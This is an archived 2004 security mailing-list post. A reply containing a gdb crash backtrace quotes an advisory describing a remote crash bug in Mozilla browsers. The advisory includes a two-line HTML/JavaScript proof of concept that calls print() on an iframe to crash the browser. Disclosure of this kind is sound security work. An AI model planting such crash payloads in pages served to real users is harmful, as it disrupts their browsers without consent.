lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <41B4B62C.1020706@secnetops.com>
Date: Mon, 06 Dec 2004 14:42:36 -0500
From: Kevin Finisterre <kf_lists@...netops.com>
To: Niek van der Maas <niekvdmaas@...il.com>
Cc: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: Re: [Advisory] Mozilla Products Remote Crash Vulnerability


(gdb) c
Continuing.
[New Thread 147461 (LWP 10836)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 10810)]
0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from 
/usr/lib/mozilla/components/libgklayout.so
(gdb) bt
#0  0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from 
/usr/lib/mozilla/components/libgklayout.so
#1  0x40a5e665 in XPTC_InvokeByIndex () from /usr/lib/mozilla/libxpcom.so
#2  0x412cb905 in NSGetModule () from 
/usr/lib/mozilla/components/libxpconnect.so
#3  0x412d28a5 in NSGetModule () from 
/usr/lib/mozilla/components/libxpconnect.so
#4  0x4005fde6 in js_Invoke () from /usr/lib/libmozjs.so
#5  0x40069215 in js_Interpret () from /usr/lib/libmozjs.so
#6  0x400604ac in js_Execute () from /usr/lib/libmozjs.so
#7  0x4003b8b4 in JS_EvaluateUCScriptForPrincipals () from 
/usr/lib/libmozjs.so
#8  0x411068c8 in nsJSContext::EvaluateString () from 
/usr/lib/mozilla/components/libgklayout.so
#9  0x40fa0020 in nsScriptLoader::EvaluateScript () from 
/usr/lib/mozilla/components/libgklayout.so
#10 0x40f9fc2e in nsScriptLoader::ProcessRequest () from 
/usr/lib/mozilla/components/libgklayout.so
#11 0x40f9f7a5 in nsScriptLoader::IsScriptEventHandler () from 
/usr/lib/mozilla/components/libgklayout.so
#12 0x4101c6e7 in nsHTMLScriptElement::MaybeProcessScript () from 
/usr/lib/mozilla/components/libgklayout.so
#13 0x4101bc66 in nsHTMLScriptElement::SetDocument () from 
/usr/lib/mozilla/components/libgklayout.so
#14 0x40f5ac89 in nsGenericElement::AppendChildTo () from 
/usr/lib/mozilla/components/libgklayout.so
#15 0x41045de4 in HTMLContentSink::ProcessSCRIPTTag () from 
/usr/lib/mozilla/components/libgklayout.so
#16 0x410431d0 in HTMLContentSink::Init () from 
/usr/lib/mozilla/components/libgklayout.so
#17 0x4157318f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#18 0x08a756e8 in ?? ()
#19 0x08d9bd30 in ?? ()
#20 0xbffff1a8 in ?? ()
#21 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#22 0x08c8e9b8 in ?? ()
#23 0x00000000 in ?? ()
#24 0xbffff1a8 in ?? ()
#25 0x41570f8c in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#26 0x08c8e9b8 in ?? ()
#27 0x08d9bd30 in ?? ()
#28 0xbffff1d8 in ?? ()
#29 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#30 0x00000054 in ?? ()
#31 0x00000000 in ?? ()
---Type <return> to continue, or q <return> to quit---
#32 0xbffff1d8 in ?? ()
#33 0x41572a56 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#34 0x08c8e9b8 in ?? ()
#35 0x08d9bd30 in ?? ()
#36 0xbffff1d8 in ?? ()
#37 0x4156889f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#38 0x08162600 in ?? ()
#39 0x00000000 in ?? ()
#40 0x08c8e9b8 in ?? ()
#41 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#42 0x00000001 in ?? ()
#43 0x00000001 in ?? ()
#44 0xbffff228 in ?? ()
#45 0x4156f1a5 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#46 0x08c8e9b8 in ?? ()
#47 0x08d9bd30 in ?? ()
#48 0x00000054 in ?? ()
#49 0x00000001 in ?? ()
#50 0x00000000 in ?? ()
#51 0x08d9bd30 in ?? ()
#52 0x08c8e9b8 in ?? ()
#53 0x4157132e in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#54 0xbffff218 in ?? ()
#55 0x415b2840 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#56 0x00000001 in ?? ()
#57 0x00000001 in ?? ()
#58 0x00000001 in ?? ()
#59 0x08c8e9b8 in ?? ()
#60 0x00000001 in ?? ()
#61 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#62 0x00000000 in ?? ()
#63 0x00000000 in ?? ()
---Type <return> to continue, or q <return> to quit---
#64 0xbffff268 in ?? ()
#65 0x4156ffcc in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#66 0x08c8e9b8 in ?? ()
#67 0x08972690 in ?? ()
#68 0x00000054 in ?? ()
#69 0x08d9bd30 in ?? ()
#70 0x08972800 in ?? ()
#71 0x00000000 in ?? ()
#72 0x0000000f in ?? ()
#73 0x00000054 in ?? ()
#74 0x08d9bd30 in ?? ()
#75 0x08c8e9b8 in ?? ()
#76 0x00000001 in ?? ()
#77 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#78 0x00000000 in ?? ()
#79 0x08972690 in ?? ()
#80 0xbffff348 in ?? ()
#81 0x4156e357 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so
#82 0x08c8e9b8 in ?? ()
#83 0x08972690 in ?? ()
#84 0x00000028 in ?? ()
#85 0x0805d486 in nsSubstring::Assign ()
Previous frame inner to this frame (corrupt stack?)

-KF


Niek van der Maas wrote:
> Hi,
> 
> I'm posting it here, the Mozilla guys didn't want to answer or even
> confirm this bug. No idea whether this one is exploitable or not, I'll
> leave that over to the readers of these lists.
> Bye,
> 
> Niek van der Maas
> MaasOnline
> http://maas-online.nl/
> 
> 
> Mozilla Products Remote Crash Vulnerability
> ===========================================
> 
> Vendor        : The Mozilla Organisation
> Product(s)    : Navigator, Firefox, other Gecko based products
> Version(s)    : All released versions
> Platform(s)   : All platforms (confirmed on Windows, Linux and SunOS)
> Discovered by : Niek van der Maas, MaasOnline (http://maas-online.nl/)
> Advisory URL  : http://maas-online.nl/security/advisory-mozilla-crash.txt
> 
> 
> DESCRIPTION
>   While working on one of my projects I discovered a vulnerability in Firefox,
>   allowing a attacker to crash the browser. Further investigation learned that
>   this vulnerability also applies on other Mozilla products, like Navigator.
>   All platforms and versions are affected.
>   The crash occurs when a one-line JavaScript is executed which tries to print
>   an iframe. The crash does not occur when executing this JavaScript in the
>   'onload' tag or after clicking a link (i.e., 'onclick').
> 
> 
> PROOF OF CONCEPT
>   The vulnerability can be exploited with the following 2 lines of code:
>     <iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
>     <script type="text/javascript">window.frames.pocframe.print();</script>
>   A sample page containing these 2 lines is available at
>     http://maas-online.nl/security/poc-mozilla-crash.html
> 
> 
> PATCH / WORKAROUND
>   No patch is available at this time. The only solution is to disable JavaScript
>   execution at all.
> 
> 
> VENDOR RESPONSE
>   The bug (#272381) was opened 2004-11-30 in Bugzilla.
>   Until now (2004-12-06), no response or confirmation is received. Contacting
>   the Mozilla Security Team on IRC didn't help either, it seems that they're
>   simply not interested.
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ